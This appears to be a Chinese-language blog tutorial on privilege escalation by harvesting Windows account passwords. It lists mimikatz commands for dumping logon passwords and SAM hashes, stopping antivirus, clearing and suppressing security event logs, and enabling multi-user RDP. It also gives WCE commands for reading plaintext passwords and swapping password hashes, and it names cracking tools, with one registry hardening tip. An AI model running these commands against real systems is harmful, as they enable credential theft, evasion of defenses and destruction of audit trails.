提权心法（3）获取账号密码

获取账号密码是很强大得提权方式，比如ssh，远程登陆..等等

1.密码的获取

1.1mimikatz

这里主要介绍mimikatz这个工具为主  下载链接https://github.com/gentilkiwi/mimikatz

当然它不仅仅能获取密码

privilege::debug(提权到bug)

sekurlsa::logonPasswords(获取当前用户账号/密码)

process::list (查看当前进程)

process::start cale.exe(启动进程)

process::stop 杀毒软件（停掉杀毒软件）

lsadump::sam(读samwen文件，可能失败)

lsadump::hash(读密码)

ts::multirdp(设置多用户登陆)

event::clear(删除安全登陆日志)

event::drop(不让记录日志)

misc::cmd(启动cmd)

misc::wifi(查看wifi密码)

这里是常用功能

那么在拿到密码之后尝试远程连接的时候，会提示要断掉被攻击的登陆情况才可以远程连接

那么这个工具就又可以设置多用户登陆ts::multirdp(设置多用户登陆)

 

1.2WCE

 

 

wce.exe -l (显示登陆状态的账号密码) -v详细信息

wce.exe -g password (显示passord加密后的样子)

wce.exe -w 读出明文的密码

防护：注册表：

machine\system\currentcontrolset\control\las\secu

rity packages (删掉tspkg wdigest本地密码明文)

a a.psswd

b b.passwd

wce.exe -i a b.passwd (将用户a的密码改为b的密码)

 

 

1.3其他常用工具

 

 

1.4键盘记录

这个不需要很高的权限就可以监控用户的输入

 

 

 

2.密码的暴力破解

因为很多时候都是拿到加密后的密码

所以需要破解

2.1 ophcrack

 

 

 

 

 3.2  John the Ripper

可以破解各种密码 包括操作系统的密码比如linux账户的账号密码